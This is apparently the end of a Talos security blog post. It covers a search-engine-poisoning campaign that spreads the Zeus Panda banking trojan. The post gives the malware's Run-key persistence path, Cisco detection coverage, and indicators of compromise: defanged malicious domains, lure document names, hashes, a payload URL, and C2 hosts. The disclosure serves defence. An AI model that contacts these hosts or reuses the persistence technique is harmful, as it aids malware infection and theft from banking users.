HKEY_USERS\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\extensions.exe 

It sets the data value for this registry entry to the path/filename that was created by the malware. An example of the data value is below:

"C:\Users\<Username>\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\extensions.exe"s\\0 

In this particular case, the file that was dropped into the infected user's profile was named "extensions.exe" however Talos has observed several different file names being used when the executable is created.

Additional information about the operation of the Zeus Panda banking trojan once it has been unpacked has been published here.

Conclusion

Attackers are constantly trying to find new ways to entice users to run malware that can be used to infect the victim's computer with various payloads. Spam, malvertising, and watering hole attacks are commonly used to target users. Talos uncovered an entire framework that is using "SERP poisoning" to target unsuspecting users and distribute the Zeus Panda banking trojan. In this case, the attackers are taking specific keyword searches and ensuring that their malicious results are displayed high in the results returned by search engines

The threat landscape is constantly evolving and threat actors are continually looking for new attack vectors to target their victims. Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape. Users, however, must also remain vigilant and think twice before clicking a link, opening an attachment or even blinding trusting the results of a Google search.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

The following Indicators of Compromise have been identified as being associated with this malware campaign. Note that some of the domains performing the initial redirection have been cleaned, however we are including them in the IOC list to allow organizations to determine if they have been impacted by this campaign.

Domains Distributing Maldocs:

mikemuder[.]com

IPs Distributing Maldocs:

67.195.61[.]46

Domains:

acountaxrioja[.]es
alpha[.]gtpo-cms[.]co[.]uk
arte-corp[.]jp
bellasweetboutique[.]com
billing[.]logohelp[.]com
birsan[.]com[.]tr
bitumast[.]com
bleed101[.]com
blindspotgallery[.]co[.]uk
blog[.]mitrampolin[.]com
calthacompany[.]com
cannonvalley[.]co[.]za
coinsdealer[.]pl
corvettescruisingalveston[.]com
craigchristian[.]com
dentopia[.]com[.]tr
dgbeauty[.]net
dressfortheday[.]com
evoluzionhealth[.]com
gemasach[.]com
japan-recruit[.]net
jaegar[.]jp
michaelleeclayton[.]com
www[.]academiaarena[.]com
www[.]bethyen[.]com
www[.]bioinbox[.]ro
www[.]distinctivecarpet.com
www[.]helgaleitner[.]at
www[.]gullsmedofstad[.]no
usedtextilemachinerylive[.]com
garagecodes[.]com
astrodestino[.]com[.]br

Intermediary Redirect Domains

dverioptomtut[.]ru

Word Doc Filenames:

nordea-sweden-bank-account-number.doc
al-rajhi-bank-working-hours-during-ramadan.doc
how-many-digits-in-karur-vysya-bank-account-number.doc
free-online-books-for-bank-clerk-exam.doc
how-to-cancel-a-cheque-commonwealth-bank.doc
salary-slip-format-in-excel-with-formula-free-download.doc
bank-of-baroda-account-balance-check.doc
bank-guarantee-format-mt760.doc
incoming-wire-transfer-td-bank.doc
free-online-books-for-bank-clerk-exam.doc
sbi-bank-recurring-deposit-form.doc

Word Doc Hashes:

713190f0433ae9180aea272957d80b2b408ef479d2d022f0c561297dafcfaec2 (SHA256)

PE32 Distribution URLs:

settleware[.]com/blog/wp-content/themes/inove/templates/html/krang.wwt

PE32 Hashes:

59b11483cb6ac4ea298d9caecf54c4168ef637f2f3d8c893941c8bea77c67868 (SHA256)
5f4c8191caea525a6fe2dddce21e24157f8c131f0ec310995098701f24fa6867 (SHA256)
29f1b6b996f13455d77b4657499daee2f70058dc29e18fa4832ad8401865301a (SHA256)
0b4d6e2f00880a9e0235535bdda7220ca638190b06edd6b2b1cba05eb3ac6a92 (SHA256)

C2 Domains:

hppavag0ab9raaz[.]club
havagab9raaz[.]club

C2 IP Addresses:

82.146.59[.]228